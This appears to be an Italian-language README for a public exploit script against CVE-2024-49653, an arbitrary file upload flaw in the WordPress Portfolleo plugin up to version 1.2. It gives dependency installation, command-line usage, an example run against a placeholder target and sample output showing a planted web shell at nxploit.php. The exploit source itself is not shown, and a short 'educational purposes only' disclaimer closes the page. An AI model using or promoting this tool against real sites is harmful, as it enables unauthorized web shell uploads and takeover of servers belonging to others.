
Plugin WordPress Portfolleo <= 1.2 - Vulnerabilità di caricamento arbitrario di file
Titolo: Plugin WordPress Portfolleo <= 1.2 - Vulnerabilità di upload arbitrario di file
Descrizione:
Vulnerabilità di upload senza restrizioni di file con tipo pericoloso in James Eggers Portfolleo portfolleo permette di caricare una web shell su un server web. Questo problema interessa Portfolleo dalla versione n/a fino alla 1.2.
Maggiori informazioni:
Punteggio CVSS:
Questo script sfrutta la vulnerabilità di upload arbitrario di file nel plugin WordPress Portfolleo (versioni <= 1.2) per caricare una web shell.
È necessario avere installato quanto segue per eseguire lo script:
requests librarybeautifulsoup4 libraryPuoi installare le librerie richieste usando:
pip install requests beautifulsoup4
Esegui lo script con le seguenti opzioni:
CVE-2024-49653.py [-h] -u URL -U USERNAME -p PASSWORD
WordPress Portfolleo plugin <= 1.2 - Arbitrary File Upload vulnerability # by Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Base URL of the site (e.g. http://target/wordpress)
-U, --username USERNAME
WordPress username
-p, --password PASSWORD
WordPress password
python CVE-2024-49653.py -u http://target/wordpress.com -U Nxploited -p password123
Se lo script viene eseguito correttamente, dovresti vedere il seguente output:
[+] Logged in successfully.
[+] Extracted _wpnonce: e5f7ffa134
[+] Shell has been uploaded.
[*] Check the shell here: http://target.com/wp-content/portfolleo/nxploit.php
Questo script è inteso esclusivamente a scopo educativo. L'autore non approva l'uso di questo script per attività illegali. Usalo in modo responsabile e solo su sistemi per i quali hai esplicita autorizzazione al test.
Di: Nxploited | Khaled Alenazi